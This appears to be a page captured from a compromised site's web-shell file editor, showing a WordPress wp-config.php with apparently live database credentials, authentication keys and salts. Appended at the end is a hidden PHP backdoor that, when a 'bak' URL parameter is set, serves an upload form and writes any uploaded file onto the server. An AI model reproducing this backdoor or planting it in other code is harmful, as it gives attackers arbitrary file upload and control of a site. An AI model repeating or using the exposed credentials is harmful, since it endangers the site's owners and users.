Edit file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_xmnbx'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_hqpfl'); /** Database password */ define('DB_PASSWORD', '_Hu5H2J!C!W8yyIp'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'K45F1TTK*e]SB@R8:[nh+3RpRx%*[)Yn#n5YyY!2K55W7D1j|bE9bJpy-YX|I|N#'); define('SECURE_AUTH_KEY', 'F8ay8_5;9E#so9LZcCP74/@1s[m7+6D8BtV6vPHE7M5_-)r)SDjl5qG0y@2a5oj|'); define('LOGGED_IN_KEY', 'hW1&Un6iXvQI8G26-X2G#W7*F6)*N]-EQjaTLObk7+d38@7::(:B!54mQK45Q1%3'); define('NONCE_KEY', '6w!4a7I2Js_23gCWV!!P:++v8zx04CZvep!/X2C2*X)Q76Z*p8[7E~%fb[AUw+[i'); define('AUTH_SALT', '-V1nE7879J9~8NF~5q4D4~|0s!AG##(aFW&69/o/2ZrnP[yx(op!PwK1[Z52D'); define('SECURE_AUTH_SALT', 'Zm6svgA1#7pv%|LXxTv|@J*@f4jnr#Z3j0zd:nW6@967oh2sOA8x&Ko3G8SlB8&/'); define('LOGGED_IN_SALT', '1d3:U|c8F(8Y7c!*fE(J[7@~b7kX2YW]yV/51zj667XjSp-QMWQntzzv6Jl/4233'); define('NONCE_SALT', 'u]3q662/wN/@qrKbvP[Ahe7]E:lbIN@C7OCnu-iDEDYNk[b3[t_0[xtPo6%5VpXq'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'N6pD2RbJl_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_CACHE_KEY_SALT', 'f3d6a85e2deed1b62b988af15b2a4561' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> Save